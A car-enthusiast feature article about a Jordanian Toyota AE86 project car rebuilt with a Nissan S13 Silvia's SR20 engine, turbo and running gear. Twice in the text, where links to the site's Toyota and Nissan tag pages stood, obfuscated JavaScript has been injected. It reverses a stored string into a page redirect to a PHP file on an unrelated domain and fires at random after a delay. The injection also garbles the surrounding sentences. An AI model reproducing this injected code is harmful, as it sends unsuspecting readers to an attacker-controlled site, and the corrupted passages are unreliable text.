What happens when you mate a Toyota Corolla AE86 to a Nissan S13 Silvia? crankandpiston.com finds out in Jordan

And with good reason. As well as being both a performance heavyweight (yet light in construction), the AE86 was also the weapon of choice for Keichi Tsuchiya, Japan’s perennial Drift King. A role in the Japanese racing comic series Initial D helped carve a legend into automotive culture nicely too.
Unsurprisingly, followed by its legendary status (as well as proving affordable to both buy and run), the Corolla AE86 remains one of the popular and common JDM cars in Jordan. Enter Mahmoud Saifi, a big fan of old school Japanese sport cars. Not content with just owning an AE86 though, Mahmoud wanted to build his very own, a project car that was truly one of a kind.
Being a fan of the Nissan Silvia and Toyota Supra, these two models were Mahmoud’s biggest inspiration, and seemed as good as any place to start. The plan was for his new toy to be an S13 Silvia in AE86 clothing, likely to be shunned by purists but an ideal way of merging the two loves of his life together. First stumbling block though: neither were available in the Jordanian market for purchase. Worse still, neither could be shipped in, due to both models being too old and mostly right hand drive.
Dreams are rarely stopped due to restrictions though. Mahmoud had a completely stock $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/toyota/”>Toyota AE86 parked in his driveway, plans on one day bringing it back to life having taken a backseat, and just over 18 months ago, his new project began. A close friend of Mahmoud – Rakan Zash – had recently sold his own project car, but couldn’t quite stop himself buying custom parts and wrenching modifications into place. Soon, both Mahmoud and Rakan were working side-by-side on the AE86.
A full and unregistered S13 Silvia was ordered from Japan and shipped to Jordan, soon to be stripped for parts. Both the Nissan and Mahmoud’s Toyota were sent to a friend’s garage (Mad Motors) where Ibrahim Taghazit – the ‘mastermind’ – was able to tear both cars apart and start the mating process. Ibrahim soon had the old 4A-GE engine ripped out of the Toyota and stored away, the $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/nissan/”>Nissan’s SR20 taking its place. Suspension, brakes, steering rack and even the whole rear end cradle and differential were swapped over, ‘minor jobs’ conducted whilst Mahmoud hopped on a plane to Japan for more spare parts. With approval from Rakan and the spares list slowly but surely checked off, new parts for Mahmoud’s Toyo-ssan started arriving in Jordan.
To increase pressure and durability, Ibrahim had to change 90% of the engine’s internals so it can withstand the new power output. An HKS 30/37 single turbo setup was installed, as was a complete fuel system to make the AE86 able to run on Ethanol. Mahmoud was aiming high in terms of performance and really wanted this car to be THE AE86 in Jordan.
As soon as the mechanical build was complete, the project car was finished off with a custom software tune, and the happy owner was amazed to see the Corolla producing 562whp on 2.0 bars of boost and ethanol on its dyno runs. It wasn’t long before crankandpiston.com got in touch and headed to Jordan for a shoot, since Mahmoud’s newboy is one of the cleanest AE86 projects we’ve seen coming from the Jordanian street culture.
We covered this only recently and had the feature planned for release later on. But given that today is 86 day (August 6, get it?) and that there’s only 86% left in my laptop’s battery, we figured what better time to bring this to your attention.
